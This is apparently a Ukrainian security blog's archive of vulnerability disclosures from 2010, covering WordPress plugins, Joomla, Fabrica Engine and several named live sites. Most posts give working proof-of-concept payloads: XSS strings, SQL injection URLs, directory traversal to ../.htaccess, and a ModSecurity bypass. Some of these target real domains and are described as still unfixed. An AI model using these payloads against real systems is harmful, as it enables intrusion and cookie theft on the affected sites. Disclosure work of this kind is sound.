Архів для категорії 'Уразливості'

Уразливості в Register Plus Redux для WordPress

15:01 02.12.2010

18.09.2010

Сьогодні я знайшов Cross-Site Scripting, Insufficient Anti-automation та Full path disclosure уразливості в плагіні Register Plus Redux для WordPress. Про що найближчим часом повідомлю розробникам.

Register Plus Redux є розгалуженням плагіна Register Plus (нова версія від іншого розробника). І уразливості в них подібні (можуть лише адреси відрізнятися).

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам плагіна.

02.12.2010

XSS:

POST запит на сторінці http://site/wp-login.php?action=register
"><script>alert(document.cookie)</script>В полях: First Name, Last Name, Website, AIM, Yahoo IM, Jabber / Google Talk, Password, Confirm Password.
</textarea><script>alert(document.cookie)</script>В полі: About Yourself.

Insufficient Anti-automation:

http://site/wp-login.php?action=register

В формі реєстрації немає захисту від автоматизованих запитів (капчі).

Full path disclosure:

http://site/wp-content/plugins/register-plus-redux/dash_widget.php

http://site/wp-content/plugins/register-plus-redux/register-plus-redux.php

При POST запиті на сторінці http://site/wp-login.php?action=register.

Уразливі версії плагіна Register Plus Redux 3.6.1 та попередні версії.

Уразливості на www.cynthiasays.com

23:51 01.12.2010

У серпні, 09.08.2010, я знайшов Abuse of Functionality, Insufficient Anti-automation та Cross-Site Scripting уразливості на сайті http://www.cynthiasays.com. Про що найближчим часом сповіщу адміністрацію сайта.

Про подібні уразливості я писав в статті Використання сайтів для атак на інші сайти.

Abuse of Functionality:

http://www.cynthiasays.com/mynewtester/cynthia.exe?rptmode=-1&url1=http://www.google.com

Даний функціонал може використовуватися для атаки на інші сайти. А також для проведення DoS атаки на сам сайт.

Insufficient Anti-automation:

В даному функціоналі немає захисту від автоматизованих запитів (капчі). Є лише обмеження на один запит до одного і того ж домену в одну хвилину, але дане обмеження обходиться з використанням домена з www і без.

XSS:

Добірка уразливостей

15:23 01.12.2010

В даній добірці уразливості в веб додатках:

  • EMC HomeBase Server Arbitrary File Upload Vulnerability (деталі)
  • EMC HomeBase SSL Service Arbitrary File Upload Remote Code Execution Vulnerability (деталі)
  • SQL injection vulnerability in CMS Source (деталі)
  • XSS vulnerability in CMS Source (деталі)
  • Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities (деталі)
  • Local File Inclusion in CMS Source (деталі)
  • SQL injection vulnerability in CMS Source (деталі)
  • Novell NetStorage xsrvd Long Pathname Remote Code Execution Vulnerability (деталі)
  • XSS vulnerability in CMS Source (деталі)
  • XSS vulnerability in eazyCMS (деталі)

Уразливості в плагінах для WordPress №23

23:54 30.11.2010

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах NextGEN Gallery та cforms. Для котрих з’явилися експлоіти. NextGEN Gallery - це плагін для створення галерей зображень, cforms - це плагін для створення контактних форм на сайті.

  • XSS Vulnerability in NextGEN Gallery Wordpress Plugin (деталі)
  • cforms WordPress Plugin Cross Site Scripting Vulnerability (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливість на vch.kiev.ua

17:29 30.11.2010

12.04.2010

У жовтні, 04.10.2009, я знайшов SQL Injection уразливіть на проекті http://vch.kiev.ua (інтернет магазин). Про що найближчим часом сповіщу адміністрацію проекту.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на matrix.ua.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

30.11.2010

SQL Injection:

http://vch.kiev.ua/goods.php?id=-1%20or%20version()=5

Дана уразливість досі не виправлена.

Уразливості в Fabrica Engine

23:59 29.11.2010

В 2008 та 2009 роках я знайшов Cross-Site Scripting, Denial of Service та SQL Injection уразливості в Fabrica Engine. Це комерційний движок для онлайн-магазинів. Дані уразливості я виявив на сайті matrix.ua. Про що найближчим часом повідомлю розробникам.

XSS:

http://site/search/?keyword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/search/?pmin=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/search/?pmax=%3Cscript%3Ealert(document.cookie)%3C/script%3E

DoS:

http://site/search/?keyword=

SQL Injection:

http://site/search/?pmin=1%20and%20version()=5%20limit%201/*&keyword=1
http://site/search/?pmax=1%20and%20version()=5%20limit%201/*&keyword=1

Уразливі Fabrica Engine 2.1 та попередні версії.

Добірка уразливостей

16:04 29.11.2010

В даній добірці уразливості в веб додатках:

Уразливості в Joomla

15:21 27.11.2010

16.09.2010

У травні, 15.05.2010, я знайшов Insufficient Anti-automation та Abuse of Functionality уразливості в Joomla. Уразливості мають місце в компоненті com_contact, що є стандартним компонентом Joomla. Які я виявив на сайті www.school.gov.ua. Про що найближчим часом повідомлю розробникам.

Про подібні уразливості я писав в статті Розсилка спаму через сайти та створення спам-ботнетів.

Також раніше я вже писав про уразливості в DS-Syndicate для Joomla.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

27.11.2010

Insufficient Anti-automation:

http://site/contact/

На сторінці контактів немає захисту від автоматизованих запитів (капчі).

Abuse of Functionality:

http://site/contact/

Опція “E-mail a copy of this message to your own address.” на сторінці контактів дозволяє розсилати спам з сайта на довільні емайли. А з використанням Insufficient Anti-automation уразливості можна автоматизовано розсилати спам з сайта в великих обсягах.

Уразливі всі версії Joomla з даним функціоналом (Joomla! 1.5.22 та попередні версії).

Розробники Joomla відмовилися виправляти дані уразливості в своїй системі.

Нові уразливості на matrix.ua

15:11 26.11.2010

06.04.2010

У вересні, 22.09.2009, я знайшов SQL Injection уразливості на проекті http://matrix.ua (інтернет магазин). Про що найближчим часом сповіщу адміністрацію проекту.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на citycom.ua. Також раніше я вже писав про уразливості на matrix.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.11.2010

SQL Injection:

http://matrix.ua/search/?pmin=1%20and%20version()=5%20limit%201/*&keyword=1
http://matrix.ua/search/?pmax=1%20and%20version()=5%20limit%201/*&keyword=1

Дані уразливості досі не виправлені.

Уразливості на exwp.com

15:24 25.11.2010

07.04.2010

У вересні, 27.09.2009, я знайшов Cross-Site Request Forgery, Cross-Site Scripting, Directory Traversal та Full path disclosure уразливості на проекті http://exwp.com (обмінник веб грошей). Про що найближчим часом сповіщу адміністрацію проекту.

Останній раз стосовно обмінників веб грошей я писав про уразливості на www.popolni.com.ua.

Детальна інформація про уразливості з’явиться пізніше.

25.11.2010

CSRF:

http://exwp.com/firebook/cash/?URLproxy=http://site;

Можливі CSRF та DoS атаки на інші сайти.

XSS (з використанням методів обходу ModSecurity):

http://exwp.com/firebook/cash/?URLproxy=%3Cxss%3E

http://exwp.com/guestbook/index.html?answer=%3Cxss%3E

http://exwp.com/guestbook/index.html?answer=guestbook/guest/1274704418_EX00.html;page=%22%3E%3Cxss%3E

Directory Traversal:

http://exwp.com/firebook/cash/?param=1;show=../.htaccess;

http://exwp.com/guestbook/index.html?answer=guestbook/guest/%2E%2E/index.html

Full path disclosure:

http://exwp.com/firebook/cash/?param=1;show=param.txt;

http://exwp.com/guestbook/index.html?answer=guestbook/guest/1

Дані уразливості досі не виправлені. Лише одна Directory Traversal виправлена, але в ній витоки інформації все ще можливі в папках в кореневій директорії веб сервера (де не заборонений доступ).